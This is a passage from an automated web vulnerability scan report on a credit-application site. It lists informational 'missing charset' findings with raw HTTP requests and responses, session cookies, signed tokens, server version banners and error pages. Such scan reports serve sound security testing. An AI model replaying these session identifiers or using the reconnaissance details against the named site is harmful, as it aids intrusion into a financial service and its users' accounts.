Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c72aa8c1bf5b6aa482b7011b28b7

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:50:39 GMT
X-powered-by: Servlet/2.5
Content-type: text/html;charset=ISO-8859-1
Content-length: 1929
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0


<!-- PR 80650 Starts -->

<!-- PR 80650 Ends -->



...[SNIP]...

6.5. https://www.onlinecreditcenter2.com/eapplygen2/load.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /eapplygen2/load.do

Request

GET /eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usamazon&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcobrandcard%2Fforward.html%3Fie%3DUTF8%26mpcode%3DPLCC_new_v1%26rq%3DMarketing_URL%26ref_%3Dcobrand_ch_c2_apply%26ts%3Db2a5qy6gcohj49h3hcolu9vxpmcb5ex%26place%3Dhuc%26inc%3Dplcc6%26pr%3Dconplcc%26ad%3D6MC0%26plattr%3D6MPSAC%26imp%3DA336G5NZJ23B5Q&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.pape.max_auth_age=0&pageId=ISSUANCE_CREDIT&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 19 Oct 2011 13:50:37 GMT
X-powered-by: Servlet/2.5
P3p: CP="CAO PSA OUR"
P3p: CP="CAO PSA OUR"
Content-type: text/html;charset=ISO-8859-1
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0
Content-Length: 108209


<!-- PR 80650 Starts -->

<!-- PR 80650 Ends -->



...[SNIP]...

7. HTML does not specify charset  previous
There are 2 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


7.1. https://www.onlinecreditcenter2.com/EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp

Request

GET /EApplyCommercial/comeapplygen2/jsp/application/BussAgreeSumm.jsp?langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.onlinecreditcenter2.com/EApplyCommercial/load.do?AD=0001&ARI=EFM2SH7UI9CQ0K19&POC=IPPP&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&DT=0000001319031227775&SDP=XgzvsJ975qmIdeZ5ZNoVWInAuHiM%2FkUPrInvaaNTeQR6x1L9gvedAYwyMcQ7K3yPf%2FBIxLy4p20Xis1h4Wc9sKKTe6Fm9PK77ow16HH7C23Zt04RLd9KIEC82eeeFf3tUbrqVuJm2qAHLLxbWnsp2Y0OfHb6I15041N7FuG2HKs%3D&cHash=113126151416&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c628ed5120c5e547e9472fd49253

Response

HTTP/1.1 500 Internal Server Error
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 20 Oct 2011 01:56:16 GMT
Content-type: text/html
Content-language:
Content-length: 1407
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><title>Sun GlassFish Enterprise Server v2.1 Patch03 - Error report</title><styl
...[SNIP]...

7.2. https://www.onlinecreditcenter2.com/eapplygen2/jsp/application/Internet/AgreementSummary.jsp  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinecreditcenter2.com
Path:   /eapplygen2/jsp/application/Internet/AgreementSummary.jsp

Request

GET /eapplygen2/jsp/application/Internet/AgreementSummary.jsp?langId=en HTTP/1.1
Host: www.onlinecreditcenter2.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.onlinecreditcenter2.com/eapplygen2/load.do?AD=6MC0&ARI=AO6LZLTJ71TRHJMS&POC=81PC&RU=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcart%2Fview.html&tp=6&V=34323&T=H&DT=0000001319032315362&SDP=tbfLjdz30GhWzS6UQeyu%2FIQbwiMGHKW67RPtisibUKVbqHHGLulw9XVP5HY6qptuKMr3GEURAJA9vjmyZNhs7CzoaT5dgMGFxq1yMBKx25Ij79qfTLH7V9%2BJIyA2tzalQQXZdnl%2BTtlXUMQP3usFj2UGmhVfS9vG6jXBUqBzd8Q%3D&cHash=1131261514&subActionId=1000&langId=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c72aa8c1bf5b6aa482b7011b28b7

Response

HTTP/1.1 500 Internal Server Error
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 20 Oct 2011 01:55:58 GMT
Content-type: text/html
Content-language:
Content-length: 1407
Via: 1.1 https-credit2-secure
Proxy-agent: Sun-Java-System-Web-Server/7.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><title>Sun GlassFish Enterprise Server v2.1 Patch03 - Error report</title><styl
...[SNIP]...

Report generated by XSS.CX at Mon Oct 24 13:59:30 CDT 2011.